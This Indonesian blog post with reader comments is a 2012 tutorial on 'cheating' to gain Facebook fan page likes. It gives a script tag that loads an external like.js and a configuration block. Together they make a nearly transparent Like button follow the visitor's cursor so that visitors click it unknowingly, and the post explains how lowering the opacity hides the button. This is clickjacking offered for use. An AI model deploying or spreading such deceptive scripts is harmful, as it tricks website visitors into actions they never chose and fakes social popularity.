Jumat, 04 Mei 2012

Cara Curang Menambah Like Fans Page di Blog

Hello! Sobat Blogger -_- kali ini Saya mau share nieh Cara Curang Menambah Like Fans Page di Blog Sudah ada Yang Faham dari judul Berikut? kalau Sudah ada yang tau bagus deh tapi kalau agan ada yang merasa belum tau Silahkan disimak langsung ^_^

Maksud dri judul Berikut adalah Tombol Like Fans Page akan Mengikuti Cursor kemana Cursor mengarah akan Selalu di Ikuti. Oke Untuk lebih jelasnya silahkan di Baca sampai abisss aja ea ....

Pertama Yang pastinya sobat Harus Login dulu ke Blogger, kagak usah pangjang Lebar ea udah tengah malem Ane ngantuk -_-

Pertama Cari kode <body> kemudian Copy kode Berikut kemudian pastekan di bawah kode <body> Setelah itu Simpan Template

<script language='javascript' src='http://vicahya.googlecode.com/files/like.js'/>

Langkah terakhir Tambahkan Gadget Copy kode Barikut

<script language='javascript'>var fan_page_url = 'http://www.facebook.com/pages/Tutorial-Vicahya/360478127311795'
var opacity = 0.3;
var time = 30000;</script>

Yang Bewarna Merah itu sobat ganti dengan URL Fans Page Sobat

var opacity = 0.3; -> Ini adalah ke Transparanan Button Like tersebut semakin kecil angkanya semakin tidak terlihat pula tombol Like tersebut


var time = 30000; -> Ini adalah kode Yang akan Menghilang maksudnya Per-Scond nya 30000 Itu berarti 30 Detik maka dalam 30 Detik Tombol Like itu akan Hilang

Oke Sobat blogger sampai disini aja Tutorial atau Tips, Trik saya kali ini Semoga ini bermanfaat, Terimakasih :)
Agen Bola online Agen Bola online

6 komentar:

  1. Mnataf deh... boleh nih ane coba...

    BalasHapus
  2. yah gak work gan..
    gmn ne ?

    BalasHapus
  3. @Fajri Alhadi URL Fans page pastikan sudah sobat ganti, terus lihat di Cursor Blog agan tombol like tersebut akan selalu mengikuti cursor blog agan

    dan kode JS nya letakan di atas /b o d y atau di bawah b o d y

    maaf itu saya spacekan karena di larang di kotak komentar ^_^

    BalasHapus
  4. work 100% ga gan, kalau work ane mau coba.


    Salam kenal gan. . .

    BalasHapus

 

Tutorial Vicahya' - Just Sharing © 2012 | Template by Bamz Display Pagerank